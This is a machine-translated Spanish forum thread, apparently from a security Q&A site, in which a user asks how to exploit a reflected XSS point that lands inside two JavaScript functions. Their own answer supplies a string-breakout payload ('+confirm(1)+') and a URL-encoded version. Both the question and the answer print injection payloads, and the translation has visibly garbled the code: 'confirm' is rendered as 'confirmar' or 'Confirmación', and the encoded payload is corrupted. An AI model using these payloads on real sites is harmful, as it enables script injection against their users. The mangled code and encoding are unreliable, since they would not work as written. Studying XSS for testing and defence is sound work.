Activando un XSS

Question

Activando un XSS

#1 de Aayush (0 votos)

0

He encontrado un XXS-vuln, pero no puedo explotarlo. Mi entrada (66038 ');} confirmar (1); / *) aparece dos veces. La idea era cerrar la función foo1 () y activar la confirmación (1). Pero foo2 es el problema. No es posible inicializar foo_var con la misma carga útil. El personaje) es el problema. ¿Alguna idea?

function foo1(){

    if('EUR66038');}confirm(1);/* != 'blabla'



 /*
    Some comments
   */


function foo2()
{
    var foo_var= 'EUR66038');}confirm(1);/* //Comment
...

reflected-xss

pregunta aaa bbb 04.12.2018 - 21:19

fuente

1 respuesta

Lea otras preguntas en las etiquetas reflected-xss

Introspección VM frente a VMbox para análisis de malware ¿Cómo configurar el servidor web para tls 1.3 0-RTT attack?

score 0 · Answer 1

0

La siguiente carga útil funcionará: -

EUR66038 '+ confirmar (1) +' 820

versión codificada: -

EUR66038% 27% 2 Confirmación (1)% 2B% 27820

respondido por el Aayush 05.12.2018 - 06:30

fuente